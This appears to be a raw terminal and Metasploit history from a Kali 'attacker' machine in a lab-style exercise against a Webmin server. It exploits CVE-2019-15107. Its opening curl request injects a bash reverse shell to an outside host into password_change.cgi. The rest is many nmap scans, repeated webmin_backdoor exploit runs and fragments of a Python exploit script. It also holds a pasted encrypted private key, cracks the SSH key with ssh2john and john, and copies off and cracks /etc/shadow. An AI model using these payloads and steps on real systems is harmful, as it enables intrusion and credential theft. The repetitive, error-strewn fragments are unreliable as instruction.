curl -ks 'http://172.18.1.5:10000/password_change.cgi' -d 'user=wheel&pam=&expired=2&old=bash -i >& /dev/tcp/10.1.135.83/8888 0>&1|echo f3a0c13c3765137bcde68572707ae5c0&new1=wheel&new2=wheel' -H 'Cookie: redirect=1; testing=1; sid=x; sessiontest=1;' -H "Content-Type: application/x-www-form-urlencoded" -H 'Referer: http://172.18.1.5:10000/session_login.cgi'
ruby 47230.rb
ruby 47230.rb http://172.18.1.5:10000
ruby 47230.rb http://172.18.1.5:10000 cmd
msfconsole
search webmin
use 5
show
options
set RHOST 172.18.1.5
set RPORT 10000
ifconfig
set LHOST 10.1.135.83
check
expolit
cls
clear
ls -lA
ls -lA ../
ls -lA ../../
ls -lA ../../../
nmap
nmap -v -A 172.18.1.5
nmap 172.18.1.5
nmap 172.18.1.1/24
nmap -sV 172.18.1.1/24
nmap --script vuln 172.18.1.1/24
msf auxuliary/admin/file_disclosure
nmap --script vuln 172.18.1.0/24
sudo nmap 172.18.1.5
nmap 100.100.100.159
ssh 100.100.100.159
ipconfig
ifconfig
nmap 100.100.100.159 -p-
nmap 172.18.1.5 -p-
nmap
nmap -sV 172.18.1.5
nmap -sC --script=http* 172.18.1.5 -p 10000
nmap -sC --script-name=http* 172.18.1.5 -p 10000
search 2019-15107
use 1
use -
search 2019-15107
use 0
options
SET RHOST 172.18.1.5
RHOST=172.18.1.5
?
SET RHOSTS 172.18.1.5
set RHOSTS 172.18.1.5
OPTIONS
options
exploit
ncat -lvnp -p 4444
set LHOST 10.1.135.83
ls
ssh2john.py
python ssh2john.py
clear
nmap -sL 172.18.1.5
nmap 172.18.1.5
nmap -sV 172.18.1.5
nmap -sV -p22 172.18.1.5
nmap -sC -p22 172.18.1.5
nmap -sC -p10000 172.18.1.5
ls
python ssh2john.py
python ssh2john.py 23:f3:2b:39:32:b5:b9:b1:14:43:d5:75:7e:50:53:22
nmap -A 172.18.1.5
nmap -A 172.18.1.5
nmap -sV -p22 172.18.1.5
nmap -sV 172.18.1.5
nmap -sV 172.18.1.5
search webmin
info 0
info 5
Metasploit
exit
msfconsole
Metasploit
exploits
help
search help
search Webmin
run use exploit/linux/http/webmin_backdoor
use exploit/linux/http/webmin_backdoor
connect
connect 172.18.1.5 10000
use exploit/linux/http/webmin_backdoor
exir
exit
msfconsole Metasploit
use exploit/linux/http/webmin_backdoor
show options
set RHOST 172.18.1.5
set LHOST 10.1.135.83
EXPLOIT
exploit
exit
msfconsole Metasploit
use exploit/linux/http/webmin_backdoor
set RHOST 172.18.1.5
set LHOST 10.1.135.83
exploit
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
python3 ssh2john.py id_rsa > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
python3 ssh2john.py -----BEGIN RSA PRIVATE KEY----- > hash
python3 ssh2john.py -----BEGIN RSA PRIVATE KEY----- > hash
Proc-Type: 4,ENCRYPTED
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,48A98AC639005A4158AA7B9CEEF483C4
DEK-Info: AES-128-CBC,48A98AC639005A4158AA7B9CEEF483C4
DEK-Info: AES-128-CBC,48A98AC639005A4158AA7B9CEEF483C4
DEK-Info: AES-128-CBC,48A98AC639005A4158AA7B9CEEF483C4
Ps9uCxB/vjzzEwZU+BjohF/sb/kaa+thfeYki9iFGqVQpHbPhdZU7JO2rKTU3w4k
...
22unE+jCDSQMF9IygWb8HfzBsruZ7IQ+/h7g7XDpEZrJf6+mdmbzBXLwlnnD1XG3
clear
python3 ssh2john.py Ps9uCxB/vjzzEwZU+BjohF/sb/kaa+thfeYki9iFGqVQpHbPhdZU7JO2rKTU3w4k > hash
python3 ssh2john.py Ps9uCxB/vjzzEwZU+BjohF/sb/kaa+thfeYki9iFGqVQpHbPhdZU7JO2rKTU3w4k > hash
2OG1q9DAD07fQPpCmX5vqWAdmeaWq//2k3zRVsadFF3daPGjWs1f61j4/JqYBSDl
...
pq5zI0lH1Vf4jlhYpD/PXMmULzR28OIOVrkcUeZPVlv+aIpLd6zbe8mfIEDCzH9G
clear
exit
msfconsole Metasploit
backgrounf
background
sessions -u 1
exit
msfconsole Metasploit
background
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,48A98AC639005A4158AA7B9CEEF483C4
Ps9uCxB/vjzzEwZU+BjohF/sb/kaa+thfeYki9iFGqVQpHbPhdZU7JO2rKTU3w4k
...
bTXmV+hQf+gS7PjVRthqPONau6on19uDDVXNeuVygP4T8H5v6kAurFVX1rvkbaSm
ssh 172.18.1.5
nmap 172.18.1.5
nmap -help
nmap 172.18.1.5 -sV
nmap -sV 172.18.1.5
nmap -sV 172.18.1.5
nmap -sV 172.18.1.5
ssh 172.18.1.5 -p 10000
ssh 172.18.1.5 -p 10000
msfconsole --help
msfconsole --help
msfconsole --help
msf > search
msfconsole > search
msfconsole > search webmin
mfsconsole
search webmin
use exploit/unix/webapp/webmin_backdoor
show targets
options
set LHOST 172.18.1.5
set LPORT 10000
run
set RHOSTS 172.18.1.5.
set LHOST 10.1.135.83
run
sessions -u 1
backgrounf
background
run
msf6 > sessions -u 6
nmap
nmap 172.18.1.5
nmap 172.18.1.5 =s
nmap 172.18.1.5 -s
nmap -v -sn 172.18.1.5
nmap --help
nmap -f 172.18.1.5
nmap -d 172.18.1.5
nmap -d 172.18.1.5
man nmap
nmap -A -T4 172.18.1.5
nmap -A 172.18.1.5
man nmap
nmap -o 172.18.1.5
nmap -o -t 172.18.1.5
nmap -O -t 172.18.1.5
nmap -O 172.18.1.5
nmap -sV 172.18.1.5
nmap -sV 172.18.1.5
nmap -sV 172.18.1.5 -p 22
nmap -sV 172.18.1.5 -p 10000
nmap -sV 172.18.1.5 -p 10000
webmint
Webmin
ls
cat ssh2john.py
msfconsole
ms
search
seach cve:2019-15107
search cve:2019-15107
use 0
msfconsole
search cve:2019-15107
use exploit/unix/http/webmin_backdoor
search cve:2019-15107
info 0
use 0
show options
set LHOST 10.1.135.83
set RHOSTS 172.18.1.5
run
qdLPGkLT8dEgrajh9t2TaoU+/+mxtGXaJ7Iea9I+g9l
22unE+jCDSQMF9IygWb8HfzBsruZ7IQ+/h7g7XDpEZrJf6+mdmbzBXLwlnnD1XG3
...
sah7VmkiXIRvhXdcVA/QXlpG7NfOVGfm/zVDfpWPAGUrGegNb3X5Y6QTzDE4lhcK
-----END RSA PRIVATE KEY-----[
msfconsole
vim id_rsa
vim
vim id_rsa
nano id_rsa
nano id_rsa
ls
history
search cve:2019-15107
set LHOST 10.1.135.83
set RHOSTS 172.18.1.5
run
use
run
set RHOSTS 172.18.1.5
use
use 0
set RHOSTS 172.18.1.5
set LHOST 10.1.135.83
use
run
sessions -u 1
sessions -i 2
exit
msfconsole
ls
ssh2john.py id_rsa
python ssh2john.py id_rsa
john
python ssh2john.py id_rsa > id_rsa_john
john --wordlist /usr/share/wordlists/rockyou.txt ssh2john.py
john --wordlist /usr/share/wordlists/rockyou.txt id_rsa_john
john --wordlist /usr/share/wordlists/rockyou.txt id_rsa_john
john --wordlist /usr/share/wordlists/rockyou.txt id_rsa_john
ls
python ssh2john.py id_rsa > id_rsa_john
john --wordlist /usr/share/wordlists/rockyou.txt id_rsa_john
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa_john
arp -a
ifconfig
ping 172.18.1.5
netstat -ltnp
nmap -sn 172.18.1.5
nmap  172.18.1.5
nmap -sV -O 172.18.1.5
sudo nmap -sTU -O 172.18.1.5
sudo nmap -sV -O 172.18.1.5
nmap  172.18.1.5 --allports
nmap  172.18.1.5 --top-ports 10
nmap  172.18.1.5 --top-ports 100
nmap  172.18.1.5 --top-ports 1
nmap  172.18.1.5 --top-ports 20
nmap  172.18.1.5 --top-ports 30
nmap -F  172.18.1.5
nmap -F  -6 172.18.1.5
nmap -F  172.18.1.5
nmap --reason  172.18.1.5
nmap 10000  172.18.1.5
nmap -p 10000  172.18.1.5
nmap -sV -p 10000  172.18.1.5
help
vulns
db_connect
search --help
help search
search -S Webadmin
search -S webadmin
search cve:2019 type:exploit
search cve:2019-15107
search cve:2019-15107 -u
help exploit
exploit
exploit 172.18.1.5
run
run 172.18.1.5
run RHOSTS=172.18.1.5
show options
RHOSTS=172.18.1.5
set RHOSTS 172.18.1.5
ifconfig
set LHOST 192.168.128.153
exploit
help exploit
bash
ls
set LHOST 10.1.135.83
exploit
ls
nano id_rsa
cat id_rsa
ls
./ssh2john.py id_rsa
ls
nano hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
nmpa --help
nmap --help
nmap 172.18.1.5
nmap 172.18.1.5 -p
nmap 172.18.1.5 -p10000
nmap 172.18.1.5
nmap -sn 172.18.1.5
nmap -sV 172.18.1.5
nmap -sV -O 172.18.1.5
sudo nmap -sV -O 172.18.1.5
nmap 172.18.1.5
nmap 172.18.1.5 -sV
nmap 172.18.1.5 -sV
nmap 172.18.1.5 -d
nmap 172.18.1.5 -d -d
nmap 172.18.1.5
hosts
msf
nmap
nmap -sV 172.18.1.5
nmap -sC 172.18.1.5 -p 22
nmap 172.18.1.5
nmap -sC 172.18.1.5 -p 10000
nmap -sV 172.18.1.5 -p 10000
nmap 172.18.1.5 -sV -p 10000
curl 172.18.1.5:100000/password_change.cgi -d 'user=root&pam=&expired=2|ifconfig&old=foo&new1=bar&new2=bar'
curl http://172.18.1.5:100000/password_change.cgi -d 'user=root&pam=&expired=2|ifconfig&old=foo&new1=bar&new2=bar'
curl 172.18.1.5:10000/password_change.cgi -d 'user=root&pam=&expired=2|ifconfig&old=foo&new1=bar&new2=bar'
help
listm
search CVE-2019-15107
use exploit/linux/http/webmin_backdoor
whoami
ls
cd /root/
cd /root
exit
bash
exploit
set RHOSTS 172.18.1.5
exploit
set LHOST 172.18.1.5
exploit
run
set RPORT 10000
set LHOST 10.1.135.83
exploit
run
exploit
exit
msfconsole
ls
echo -----BEGIN RSA PRIVATE KEY-----
echo -----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,48A98AC639005A4158AA7B9CEEF483C4
DEK-Info: AES-128-CBC,48A98AC639005A4158AA7B9CEEF483C4
DEK-Info: AES-128-CBC,48A98AC639005A4158AA7B9CEEF483C4
DEK-Info: AES-128-CBC,48A98AC639005A4158AA7B9CEEF483C4
Ps9uCxB/vjzzEwZU+BjohF/sb/kaa+thfeYki9iFGqVQpHbPhdZU7JO2rKTU3w4k
...
uSoF68eAZXd6R9bL03s9HQvGkSZv8zaFlmK4wRVI5frYMlU5gzD5E/e6Id5X7uCQ
touch key
nano micro key
ls
cat key
micro key
nano key
sessions -u 1
sessions -i 2
use exploit/linux/http/webmin_backdoor
set RPORT 10000
set LHOST 10.1.135.83
set RHOSTS 172.18.1.5
-----BEGIN RSA PRIVATE KEY-----
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,48A98AC639005A4158AA7B9CEEF483C4
DEK-Info: AES-128-CBC,48A98AC639005A4158AA7B9CEEF483C4
DEK-Info: AES-128-CBC,48A98AC639005A4158AA7B9CEEF483C4
DEK-Info: AES-128-CBC,48A98AC639005A4158AA7B9CEEF483C4
Ps9uCxB/vjzzEwZU+BjohF/sb/kaa+thfeYki9iFGqVQpHbPhdZU7JO2rKTU3w4k
...
N/jFdUnWSkA2wEgzupDZmPU6jyJ/BosOxJVkih4oQB1s9BO+HzI7oA5sDfO/gw1R
nano
run
sessions -u 1
ls
ls -l
nmap -h
ifconfig
ping 172.18.1.5
nmap 172.18.1.5
nmap 172.18.1.0/24
nmap 172.18.1.0/24
nmap -A 172.18.1.5
http-robots.txt
nmap -A 172.18.1.5
nmap -O 172.18.1.5
sudo nmap -O 172.18.1.5
sudo nmap -sV 172.18.1.5
172.18.1.5
meterpreter
info -d
info -j
search webmin
info 0
info 5
connect 172.18.1.5
connect 172.18.1.5 -P 10000
connect -S 172.18.1.5 -P 10000
connect -h 172.18.1.5 -p 10000
connect 172.18.1.5 10000
bash 172.18.1.5 10000
exploit
quit
msfconsole
msfconsole -h
help
search webmin
exploit exploit/linux/http/webmin_backdoor
exploit/linux/http/webmin_backdoor
connect
connect RHOST 172.18.1.5 RPORT 10000
connect LHOST 172.18.1.5 LPORT 10000
connect RHOST 172.18.1.5 PORT 10000
connect RHOST 172.18.1.5
use exploit/linux/http/webmin_backdoor
show options
set RHOST 172.18.1.5
connect
ifconfig
set LHOST 10.1.135.83
exploit
exit
msfconsole
msfconsole
namp -A 172.18.0.0/16
nmap -A 172.18.0.0/16
use exploit/linux/http/webmin_backdoor
set RHOST 172.18.1.5
set LHOST 10.1.135.83
exploit
tshark host 172.18.1.5
tshark host 172.18.1.5
sudo
su
tshark -D
tshark -i eth1
sudo tshark -i eth1
namp
nmap
nmap -sp 172.18.1.5
sudo nmap -sp 172.18.1.5
sudo nmap -sL 172.18.1.5
sS
nmap 172.18.1.5
nmap 172.18.1.5 -p 10000
nmap -sn 172.18.1.5
nmap -p 10000 172.18.1.5
nmap -p 22 172.18.1.5
nmap --help
nmap -sV 172.18.1.5
nmap -sV 172.18.1.5
resource
resource webmin
webmin
show exploits
search webmin
info 0
INFO 1
search webmin
INFO 5
info 5
msfconsole webmin
ms
msfsconsole webmin
search webmin
msfconsole
nmap
nmap -sV 172.18.1.5
nmap -sV -p 10000 172.18.1.5
nmap 172.18.1.5
nmap -sV 10000 172.18.1.5
msf
search webmin
info 5
msfconsole
webmin 172.18.1.5
ssh 172.18.1.5
ssh 172.18.1.5
search webmin
use exploit/linux/http/webmin_backdoor
help
check
check 172.18.1.5
exploit 172.18.1.5
exploit -f 172.18.1.5
exploit -j 172.18.1.5
help
show targets
show payloads
show options
exploit
exploit -h
exploit -p LHOST 172.18.1.5
exploit -t 0 -p LHOST 172.18.1.5
exploit -t 0 172.18.1.5
show path-to-exploit
show path
path-to-exploit
show
show all
show options
help
set RHOSTS
set RHOSTS 172.18.1.5
set LHOST 10.1.135.83
show options
set lport 10000
show options
exploit RHOSTS
exploit -f
msfconsole
search webmin
use 5
set LHOST 10.1.135.83
set RHOSTS 172.18.1.5
exploit -f
set Rport 10000
exploit -f
show options
show RPORT
msfconsole
search webmin
use 5
set RHOSTS 172.18.1.5
set LHOST 10.1.135.83
set RHOSTS 10.1.135.83
set LHOST 172.18.1.5
set LPORT 10000
set LPORT 4444
msfconsole
search webmin
use 5
set RPORT 10000
set LHOST 10.1.135.83
msfconsole
search webmin
use 5
set RHOSTS 172.18.1.5
set LHOST 10.1.135.83
set RPORT 10000
exploit
msfconsole
search webmin
use 5
set RHOSTS 172.18.1.5
set RPORT 10000
set LHOST 10.1.135.83
msfconsole
search webmin
use 5
set RHOSTS 172.18.1.5
set RPORT 10000
set LHOST 10.1.135.83
msfconsole
nano keyfile.txt
cat keyfile.txt
cat keyfile.txt
vi keyfile.txt
rm keyfile.txt
cat
cat keyfile.txt
touch keyfile.txt
cat keyfile.txt
exploit
nano keyfile.txt
touch key.txt
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,48A98AC639005A4158AA7B9CEEF483C4
Ps9uCxB/vjzzEwZU+BjohF/sb/kaa+thfeYki9iFGqVQpHbPhdZU7JO2rKTU3w4k
nano key.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hash
msfconsole
search webmin
use 5
set RHOSTS 172.18.1.5
set RPORT 10000
set LHOST 10.1.135.83
nano key.txt
search webmin
use 5
set RHOSTS 172.18.1.5
set RPORT 10000
set LHOST 10.1.135.83
nano key.txt
touch key
nano key
cat key
python3-----BEGIN RSA PRIVATE KEY-----
python3-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,48A98AC639005A4158AA7B9CEEF483C4
DEK-Info: AES-128-CBC,48A98AC639005A4158AA7B9CEEF483C4
DEK-Info: AES-128-CBC,48A98AC639005A4158AA7B9CEEF483C4
DEK-Info: AES-128-CBC,48A98AC639005A4158AA7B9CEEF483C4
Ps9uCxB/vjzzEwZU+BjohF/sb/kaa+thfeYki9iFGqVQpHbPhdZU7JO2rKTU3w4k
-----END RSA PRIVATE KEY-----\n
cat key
nmap
nmap 172.18.1.5
nmap 172.18.1.5 -p 22
nmap -sV 172.18.1.5
nmap -sV 172.18.1.5 -p 22
nmap -sV 172.18.1.5 -p 10000
webmin_show_cgi_exec
msfconsole
msfconsole -h
msfvenom
check
ls
cd ..
ls
cd kali
ls
exit
msfconsole -p cmd/unix/reverse_netcat lhost=172.18.1.5 lport=10000
ls
msfconsole -h
msfconsole
use exploit/unix/webapp/webmin_backdoo
search webmin
use 5
show targets
set TARGET 1
show options
set SRVHOST 172.18.1.5
show options
exploit
set RHSOTS 172.18.1.5
set SRVHOST 0.0.0.0
exploit
set RHOSTS 172.18.1.5
exploit
set RHOSTS 172.18.1.5
set LHOST 10.1.135.83
exploit
ls
python3 ssh2john.py id_rsa > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
nmap --help
nmap 172.18.1.5
nmap 172.18.1.5
nmap -sV 172.18.1.5
python
python -v
clean
ls
ls -a
cat ssh2john.py
nano cve.py
import requests
import requests
import re
import re
import requests.packages.urllib3
import requests.packages.urllib3
requests.packages.urllib3.disable_warnings()\n\nimport sys
requests.packages.urllib3.disable_warnings()\n\nimport sys
requests.packages.urllib3.disable_warnings()\n\nimport sys
requests.packages.urllib3.disable_warnings()\n\nimport sys
requests.packages.urllib3.disable_warnings()\n\nimport sys
requests.packages.urllib3.disable_warnings()\n\nimport sys
banner ='''\n\n _______           _______       _______  _______  __     _____       __    _______  __    _______  ______  \n\n(  ____ \|\     /|(  ____ \     / ___   )(  __   )/  \   / ___ \     /  \  (  ____ \/  \  (  __   )/ ___  \ \n\n| (    \/| )   ( || (    \/     \/   )  || (  )  |\/) ) ( (   ) )    \/) ) | (    \/\/) ) | (  )  |\/   )  )\n\n| |      | |   | || (__             /   )| | /   |  | | ( (___) |      | | | (____    | | | | /   |    /  / \n\n| |      ( (   ) )|  __)          _/   / | (/ /) |  | |  \____  |      | | (_____ \   | | | (/ /) |   /  /  \n\n| |       \ \_/ / | (            /   _/  |   / | |  | |       ) |      | |       ) )  | | |   / | |  /  /   \n\n| (____/\  \   /  | (____/\     (   (__/\|  (__) |__) (_/\____) )    __) (_/\____) )__) (_|  (__) | /  /    \n\n(_______/   \_/   (_______/_____\_______/(_______)\____/\______/_____\____/\______/ \____/(_______) \_/     \n\n                          (_____)                              (_____)                                      \n\n                                     python By jas502n\n\n'''
banner ='''\n\n _______           _______       _______  _______  __     _____       __    _______  __    _______  ______  \n\n(  ____ \|\     /|(  ____ \     / ___   )(  __   )/  \   / ___ \     /  \  (  ____ \/  \  (  __   )/ ___  \ \n\n| (    \/| )   ( || (    \/     \/   )  || (  )  |\/) ) ( (   ) )    \/) ) | (    \/\/) ) | (  )  |\/   )  )\n\n| |      | |   | || (__             /   )| | /   |  | | ( (___) |      | | | (____    | | | | /   |    /  / \n\n| |      ( (   ) )|  __)          _/   / | (/ /) |  | |  \____  |      | | (_____ \   | | | (/ /) |   /  /  \n\n| |       \ \_/ / | (            /   _/  |   / | |  | |       ) |      | |       ) )  | | |   / | |  /  /   \n\n| (____/\  \   /  | (____/\     (   (__/\|  (__) |__) (_/\____) )    __) (_/\____) )__) (_|  (__) | /  /    \n\n(_______/   \_/   (_______/_____\_______/(_______)\____/\______/_____\____/\______/ \____/(_______) \_/     \n\n                          (_____)                              (_____)                                      \n\n                                     python By jas502n\n\n'''
print banner
print banner
print banner
print banner
def CVE_2019_15107(url, cmd):
def CVE_2019_15107(url, cmd):
vuln_url = url + "/password_change.cgi"
nano cve.py
nano cve.py
nano cve.py
mfsconsole
search webmin
use exploit/linux/http/webmin_backdoor
show options
set RHOST 172.18.1.5
set RPORT 10000
set LHOST 10.1.135.83
check
exploit
sessions -u 1
sessions -i 2
python3 ssh2john.py id_rsa > hash
ls
cat hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
sudo nmap -sS -p- 172.18.1.5
man nmap
sudo nmap -sV -p 10000 172.18.1.5
Webadmin
serch webadmin
serch webmin
search webmin
info
info 1
use exploit/unix/webapp/webmin_backdoor
show options
set RHOST 172.18.1.5
set RPORT 10000
set LHOST 10.1.135.83
check
exploit
use exploit/unix/webapp/webmin_backdoor
show options
set RHOST 172.18.1.5
set RPORT 10000
set LHOST 10.1.135.83
ls
cd Desktop
ls
python3 ssh2john.py id_rsa > hash
nmap -v  172.18.1.5
nmap -v  172.18.1.5 -sv
nmap -v -sv  172.18.1.5
nmap -v -sV  172.18.1.5
nikto -h  172.18.1.5
metasploit
msf
help
check 172.18.1.5
set RHOST 172.18.1.5
run
use auxiliary/scanner/http/crawler
set RHOST
Try: apt install <deb name>
┌──(kali㉿attacker)-[~]
└─$ msfconsole 127 ⨯
d88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*"`    `?88'  ?88 ?88 88b  d88 d88
set RHOST
Try: apt install <deb name>
┌──(kali㉿attacker)-[~]
└─$ msfconsole 127 ⨯
d88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*"`    `?88'  ?88 ?88 88b  d88 d88
set RHOST 172.18.1.5
run
exit
msfconsole
nmap -v -sV  172.18.1.5
use auxiliary/scanner/portscan/syn
run
set RHOSTS  172.18.1.5
run
msfconsole
exit
nmap -sV 172.18.1.5
nmap -sV 172.18.1.5
nano test.sh
ls
cat ssh2john.py
sh test.sh http:172.18.1.5:10000
sh test.sh http://172.18.1.5:10000
nano test.py
python test.py
pythoon
python3 test.py
python test.py ls
nano test.py
nano test.py
python test.py ls
python test.py http://172.18.1.5:10000 ls
python test.py http://172.18.1.5:10000 sudo passwd root
python test.py http://172.18.1.5:10000 ls /root/
python test.py http://172.18.1.5:10000 " ls /root/"
python test.py http://172.18.1.5:10000 " ls /root/"
python test.py http://172.18.1.5:10000 "sudo passwd root"
ssh root@172.18.1.5
ls /root
ls
ls -all
ls .ssh
cat test.py
cat test.py
su root@172.18.1.5
test2
ssh root@172.18.1.5
nano test.py
python test.py
rm test.py
nano test.py
python test.py
python test.py
python3 test.py
python3 test.py -t http://172.18.1.5:10000
python3 test.py -t http://172.18.1.5:10000 -l 172.16.1.3 -p 8888
python3 test.py -t http://172.18.1.5:10000 -l 172.16.1.3 -p 8888
python3 test.py -h
ifconfig -a
python3 test.py -t http://172.18.1.5:10000 -l 192.168.130.211 -p 8888
python3 test.py -t http://172.18.1.5:10000 -l 127.0.0.1 -p 8888
search webmin
use exploit/linux/http/webmin_backdoor
show options
set RHOST 172.18.1.5
set RPORT 10000
set LHOST 10.1.135.83
check
exploit
ls
exploit
exit
msfconsole
nano ssh
python3 ssh2john.py id_rsa > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
ls
cat hash
mv ssh id_rsa
python3 ssh2john.py id_rsa > hash
cat id_rsa
ping 172.18.1.5
ping 172.18.1.5
ipconfig
nmap
nmap -help
namp --help
nmap --help
nmap -sL
nmap -sL -iL 172.18.1.5
nmap 172.18.1.5
nmap -sV -p 22
nmap -sV -p 172.18.1.5
nmap -sV -p 22/tcp
nmap -sV -p 10000
nmap -sV
nmap -sV 172.18.1.5
exit
msfconsole Webmin
msfconsole Webmin
http://172.18.1.5:10000
ssh http://172.18.1.5:10000
nmap -sV 172.18.1.5
ssh kali@172.18.1.5:10000
help
connect 172.18.1.5
connect 172.18.1.5:10000
connect 172.18.1.5 10000
connect 172.18.1.5 10000 172.18.1.5 10000
serach 172.18.1.5
search 172.18.1.5
search 172.18.1.5 10000
connect 172.18.1.5
connect 172.18.1.5 10000
search -h
search CVE-2019-15107
use exploit/linux/http/webmin_backdoor
set RHOST 172.18.1.5
set LPORT 10000
exploit
set LHOST 172.18.1.5
exploit
help
?
exit
msfconsole
msf
use exploit/linux/http/webmin_backdoor
set LHOST 172.18.1.5
set LPORT 10000
exploit
exit
msfconsole
ip
ipconfig
ifconfig
ifconfig -a
ifconfig -a
ping 192.168.128.159
msf
use exploit/linux/http/webmin_backdoor
set LHOST 192.168.128.159
set RHOST 172.18.1.5
set RPORT 10000
exploit
show options
set LHOST 10.1.135.83
exploit
sessions -u 7
sessions -i 8
background
msfconsole
use exploit/linux/http/webmin_backdoor
set LHOST 10.1.135.83
set RPORT 10000
set RHOST 172.18.1.5
exploit
exploit
exploit
nmap
nmap 172.18.1.5
ssh root@172.18.1.5
nmap -p 0-65535 172.18.1.5
nmap -p 0-65535 172.18.1.5
nmap -p 0-65535 172.18.1.5
nslookup 172.18.1.
nslookup 172.18.1.5
nmap -p 0-65535 172.18.1.5
curl http://172.18.1.5:10000
curl http://172.18.1.5:10000 | less
nmap -sV 172.18.1.5
msf
search 2019-15107
use exploit/linux/http/webmin_backdoor
help
set TARGETURI http://172.18.1.5:10000
show options
exploit
set RHOSTS 172.18.1.5
exploit
set LHOST 10.1.135.83
nmap -p 0-65535 172.18.1.5
nmap -p 0-65535 172.18.1.5
vi x
ls /usr/share
ls /usr/share
cd /usr/share/wordllists
cd /usr/share/wordlists
ls
find / -type f -name *ssh2john*
cd
ls
ssh2john.py x
./ssh2john.py x
./ssh2john.py x | tee hash
john --worldlist=/usr/share/wordlists/rockyou.txt
john --worldlist=/usr/share/wordlists/rockyou.txt has
john --worldlist=/usr/share/wordlists/rockyou.txt hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
nmap --help
nmap 172.18.1.5
nmap -sp 172.18.1.5
nmap -v -sn 172.18.1.5
nmap -v -sn http://10.1.135.83/
nmap -v -sn 10.1.135.83
nmap -sV 172.18.1.5
nmap -sV 172.18.1.5
nmap -p 22
nmap -sV 172.18.1.5 -p 22
help search
search type:exploit
use exploit/unix/webapp/webmin_backdoor
help
exploit
check
show options
set RHOSTS 172.18.1.5
set LHOST 10.1.135.83
exploit
set RHOSTS 172.18.1.5
set LHOST 10.1.135.83
help
show options
set RPORT 10000
exploit
sessions -u 7
sessions -u 6
sudo nmap 172.18.1.5
sudo nmap -sV 172.18.1.5
searchsploit webmin
msfconsoe
search webmin
use 2
show opt
show o
show options
msfconsole
ip a
search webmin
use 5
show options
set LHOST 10.1.135.83
set RHOSTS 172.18.1.5
exploit
search shell_to_meterpreter
use 0
sessions -l
set SESSION 2
run
ls
sessions -i
session -i 3
ll
ssh -i id_rsa eve@10.1.17.4
ll
chmod 700 id_rsa
ssh -i id_rsa eve@10.1.17.4
nmap 81.2.195.254
ip a
ssh-keygen -t ed25519
cat ~/.ssh/id_ed25519.pub
ps
tmux a
cd /
cd /etc/passwd
cd /etc
ls -la
sudo su
ll
ls -la
cat sudoers
cd webmin
ls -la
cd ..
ls -la
cat shadow
cat shadow-
cd /home
ls -la
ssh eve@172.18.1.5
cd /
cat /home/eve
ls
cd /home/eve
ls -la
cd /root
ls -la
cat .wget-hsts
cat .bashrc
cat .profile
cd /home
ls -al
cd bob
ls -la
cd ..
cd debian
ls -la
cd .ssh
ls -la
cat authorized_keys
cd ..
ls -la
cd ..
ll
ls -la
cd eve
ls -la
cat .gnupg/
cd .gnupg/
ll
ls la
ls -la
cat private-keys-v1.d/
cd private-keys-v1.d/
ls -la
cd ../..
ls -la
cat .bash_history
cd /media
ll
ls -la
cd -
ls -la
cat .profile
cd .ssh
ls -la
cat /etc/shadow
cd /
find . -iname "*pass*"
tmux
ssh root@web
scp root@172.18.1.5:/etc/shadow .
ll
cat shadow
scp root@172.18.1.5:/etc/passwd .
unshadow passwd shadow >unshadowed.txt
vim unshadowed.txt
vim unshadowed.txt
john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
ls -la
cd /var/www
cd /var
ll
ls -la
cd backups
ls -la
cd ..
ls -la
cd tmp
ls -la
cd /tmp
ls -la
cd webmin-1.920
ls -la
cat useradmin
ssh 10.1.17.4
ll
ls -la
cat WARNING-READ-ME.txt
cd /home
ls -la
cd eve
ls -la
cat .profile
cat .bashrc
ls -la
vim .bash_logout
cat .bash_logout
cat .bash_history
ls -la
cd /
ls -la
find . -iname "*pass*"
cat /etc/webmin/passwd
cd /root
cd
ls
ls -la
cat .bashrc
cd .cache
ls -la
cd pip
ls -la
cd ../..
ls -la
cd .ssh
ls -la
cat authorized_keys
cat known_hosts
cd ..
ls -la
cd /var/log
ls -la
vim user.log
cat user.log
ls -la
cd /srv
ls
ls -la
cd /
ls -la
cd mnt
ls -la
cd ..
ls opt
cd opt
ls -la
cd ..
ll
ls -la
cd home
ls -la
find . -name "*.txt"
find . -name "*secret*"
find . -name "*pass*"
grep -r "pass" .
cd /
grep -r "pass" .
grep -r "pass" .
cd /etc
ls
cd -la
ls -la
cd ssh
ls -la
vim sshd_config
cat sshd_config
:$
cd /home/eve
ls -la
cd .ssh
ls -la
cat id_rsa
ls -la
cat id_rsa.pub
ll
ll
ll id_rsa
cat id_rsa
ssh eve@10.1.17.4
ssh -i id_rsa eve@10.1.17.4
ssh -i id_rsa eve@10.1.17.4
python ssh2john.py id_rsa > id_rsa.hash
john id_rsa
john id_rsa.hash
ll
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash
john --wordlist=/usr/share/wordlists/rockyou.txt --format=sha512crypt unshadowed.txt
john id_rsa.hash
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash
nmap 172.18.1.5
nmap -A 172.18.1.5
nmap -p 10000 172.18.1.5
nmap -v 172.18.1.5
nmap -v 172.18.1.5
msfrpcd -h
